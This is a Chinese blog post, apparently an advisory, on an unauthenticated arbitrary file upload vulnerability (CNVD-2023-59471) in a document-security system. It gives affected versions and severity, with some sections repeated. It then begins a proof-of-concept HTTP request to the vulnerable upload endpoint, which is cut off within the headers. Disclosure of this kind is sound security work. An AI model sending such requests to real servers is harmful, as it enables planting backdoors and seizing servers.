- 1【服务器Midjourney】创建部署Midjourney网站_midjourney 云服务器搭建
- 2显存优化 | Pytorch的显存机制torch.cuda.empty_cache及周边概念_yolo添加torch.cuda.empty_cache()
- 3作物模型狂奔 Apsim 脚本并行思路
- 4mfc中的字符_mfc显示gbk字符串
- 5Docker-frps内网穿透_dockerfprs
- 6多维时序 | MATLAB实现Attention-LSTM(注意力机制长短期记忆神经网络)多输入单输出_matlab attention
- 7docker 可视化管理工具 shipyard 简介
- 8黑马程序员最新Python教程——第一阶段(3)第二阶段(1)_黑马程序员课件 python
- 900032-layui 树形下拉选择 xmSelect(二):数据懒加载_layui 懒加载select
- 10安装配置Tomcat并在NetBeans中使用_tomcat安装netbeans
亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471
赞
踩
1.漏洞概述
亿某通电子文档安全管理系统是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
CNVD:https://www.cnvd.org.cn/flaw/show/CNVD-2023-59471(目前未公开)
2.影响版本
<= V5.x
3.漏洞等级
严重
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.8
2.影响版本
<= V5.x
3.漏洞等级
严重
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.8
4.漏洞复现
POC:
-
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1 -
Host: { {hostname}} -
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 -
Connection: close -
Content-Length: 6 -
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 -
Accept-Encoding: gzip, deflate -
Accept-Language: zh-CN,zh;q=
